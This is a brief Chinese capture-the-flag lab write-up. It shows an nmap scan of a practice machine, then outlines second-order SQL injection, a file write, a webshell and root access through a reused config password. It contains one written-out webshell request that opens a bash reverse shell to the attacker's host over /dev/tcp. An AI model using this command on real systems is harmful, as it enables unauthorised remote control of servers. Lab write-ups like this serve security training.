基本信息

端口扫描

22,80,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ nmap -sC -sV 10.10.11.116

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-27 19:59 CST
Nmap scan report for 10.10.11.116
Host is up (0.32s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
119/tcp  filtered nntp
1113/tcp filtered ltp-deepspace
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5033/tcp filtered jtnetd-server
5280/tcp filtered xmpp-bosh
5987/tcp filtered wbem-rmi
8080/tcp open     http          nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.52 seconds

80

二阶SQL注入

国家参数那里,注册时正常,查看报错,可能二阶SQL注入:

验证存在:

写文件

测试可以写文件:

webshell

reverse shell & user flag

1
10.10.11.116/miao.php?cmd=bash -c 'exec bash -i %26>/dev/tcp/10.10.14.14/4444 <%261'

得到的www shell有权限读取user.txt:

提权 & root flag

config里全局密码,切到root:

参考资料